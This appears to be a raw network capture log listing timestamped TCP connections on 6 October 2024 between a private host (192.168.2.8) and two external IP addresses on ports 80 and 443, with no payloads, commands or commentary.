                                                                                                                                    Oct 6, 2024 21:26:30.548110008 CEST8049718198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.548338890 CEST8049718198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.548448086 CEST8049718198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.551330090 CEST49719443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.551368952 CEST44349719198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.551436901 CEST49719443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.551748037 CEST49719443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.551769018 CEST44349719198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.557981968 CEST49715443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.558001995 CEST44349715194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.579575062 CEST44349719198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.579646111 CEST49719443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.579684019 CEST49719443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.579700947 CEST44349719198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.580177069 CEST49720443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.580188036 CEST44349720198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.580244064 CEST49720443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.580823898 CEST49720443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.580832958 CEST44349720198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.592109919 CEST44349720198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.594810963 CEST49721443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.594844103 CEST44349721198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.594921112 CEST49721443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.595076084 CEST49721443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.595138073 CEST44349721198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.595226049 CEST49721443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:35.636430025 CEST4973080192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.783150911 CEST8049730194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.783216953 CEST4973080192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.783380985 CEST4973080192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.783402920 CEST4973080192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.789840937 CEST8049730194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.789850950 CEST8049730194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.790572882 CEST8049730194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.801904917 CEST49731443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.801929951 CEST44349731194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.801986933 CEST49731443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.802416086 CEST49731443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.802432060 CEST44349731194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.819689035 CEST44349731194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.820141077 CEST49732443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.820163965 CEST44349732194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.820219994 CEST49732443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.820691109 CEST49732443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.820708036 CEST44349732194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.831186056 CEST44349732194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.831588984 CEST49733443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.831621885 CEST44349733194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.831674099 CEST49733443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.831979036 CEST49733443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.832011938 CEST44349733194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.832053900 CEST49733443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.069386959 CEST4973480192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.074251890 CEST8049734198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.074424982 CEST4973480192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.074981928 CEST4973480192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.075068951 CEST4973480192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.079790115 CEST8049734198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.079849958 CEST8049734198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.642191887 CEST8049734198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.647181034 CEST49735443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.647244930 CEST44349735198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.647794962 CEST49735443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.648139000 CEST49735443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.648152113 CEST44349735198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.668428898 CEST44349735198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.668494940 CEST49735443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.668538094 CEST49735443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.668550968 CEST44349735198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.669302940 CEST49736443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.669343948 CEST44349736198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.671288967 CEST49736443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.673666954 CEST49736443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.673687935 CEST44349736198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.683172941 CEST4973480192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.684663057 CEST44349736198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.685252905 CEST49737443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.685286045 CEST44349737198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.685338020 CEST49737443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.685992956 CEST49737443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.686029911 CEST44349737198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.686630964 CEST49737443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.707792044 CEST4973880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.712644100 CEST8049738194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.712712049 CEST4973880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.712831020 CEST4973880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.712853909 CEST4973880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.717600107 CEST8049738194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.717632055 CEST8049738194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.717751026 CEST8049738194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.739427090 CEST49739443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.739465952 CEST44349739194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.739659071 CEST49739443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.740087986 CEST49739443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.740102053 CEST44349739194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.761718035 CEST44349739194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.761847019 CEST49739443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.761847019 CEST49739443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.762095928 CEST49740443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.762119055 CEST44349740194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.762197971 CEST49740443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.762497902 CEST49740443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.762511969 CEST44349740194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.773705959 CEST44349740194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.774041891 CEST49741443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.774066925 CEST44349741194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.774120092 CEST49741443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.774277925 CEST49741443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.774374008 CEST44349741194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.774544954 CEST49741443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.776262045 CEST4973480192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.777013063 CEST4974280192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.782090902 CEST8049742198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.782123089 CEST8049734198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.782206059 CEST4973480192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.782340050 CEST4974280192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.783082962 CEST4974280192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.783169031 CEST4974280192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.787662029 CEST8049742198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.787949085 CEST8049742198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.787997961 CEST4974280192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.788054943 CEST4974280192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.788077116 CEST8049742198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.790358067 CEST49743443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.790378094 CEST44349743198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.790441036 CEST49743443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.790721893 CEST49743443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.790735960 CEST44349743198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.793024063 CEST8049742198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.793054104 CEST8049742198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.801812887 CEST44349743198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.802324057 CEST49744443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.802345991 CEST44349744198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.802881956 CEST49744443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.803231001 CEST49744443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.803242922 CEST44349744198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.814141989 CEST44349744198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.814542055 CEST49745443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.814594984 CEST44349745198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.815119028 CEST49745443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.815339088 CEST49745443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.815391064 CEST44349745198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.815459013 CEST49745443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.993954897 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.999541998 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.999619961 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.999839067 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.999982119 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.004731894 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.004856110 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.073827028 CEST49739443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.073868036 CEST44349739194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.689305067 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.689363956 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.689408064 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.689439058 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.689492941 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.689519882 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.689529896 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.689538002 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.689564943 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.689587116 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.689599991 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.689634085 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.689688921 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.775978088 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.776026011 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.776094913 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.779608011 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.779670000 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.779700994 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.779742002 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.782963991 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.782999992 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.783036947 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.783057928 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.783077002 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.789320946 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.789375067 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.789416075 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.789450884 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.795767069 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.795852900 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.795886040 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.795938969 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.795952082 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.801888943 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.801935911 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.801976919 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.802020073 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.808279037 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.808305025 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.808331966 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.808402061 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.808419943 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.814425945 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.814454079 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.814481020 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.814502954 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.821023941 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.821057081 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.821093082 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.821129084 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.821175098 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.827163935 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.827218056 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.827308893 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.866238117 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.866275072 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.866312027 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.866343021 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.866398096 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.866420984 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.870043993 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.870079994 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.870115995 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.870142937 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.873466015 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.873517036 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.873552084 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.873583078 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.873626947 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.879551888 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.879582882 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.879650116 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.879663944 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.886149883 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.886188984 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.886214018 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.886228085 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.886297941 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.892332077 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.892393112 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.892427921 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.892479897 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.898803949 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.898859978 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.898864031 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.898895979 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.898956060 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.904952049 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.904985905 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.905040026 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.905071974 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.911134958 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.911164045 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.911175013 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.911231041 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.911258936 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.917670965 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.917685032 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.917699099 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.917737961 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.923244953 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.923258066 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.923270941 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.923306942 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.923326969 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.928571939 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.928585052 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.928596973 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.928639889 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.933641911 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.933686972 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.933696985 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.933712006 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.933732033 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.938561916 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.938572884 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.938638926 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.938664913 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.943618059 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.943641901 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.943653107 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.943658113 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.943689108 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.948771000 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.948776960 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.948785067 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.949980974 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.953752995 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.953774929 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.953784943 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.953814983 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.953828096 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.958803892 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.958842993 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.958880901 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.958899975 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.963784933 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.963797092 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.963876009 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.963891029 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.963927031 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.967165947 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.967191935 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.967204094 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.967245102 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.970215082 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.970227957 CEST8049746194.87.189.87192.168.2.8
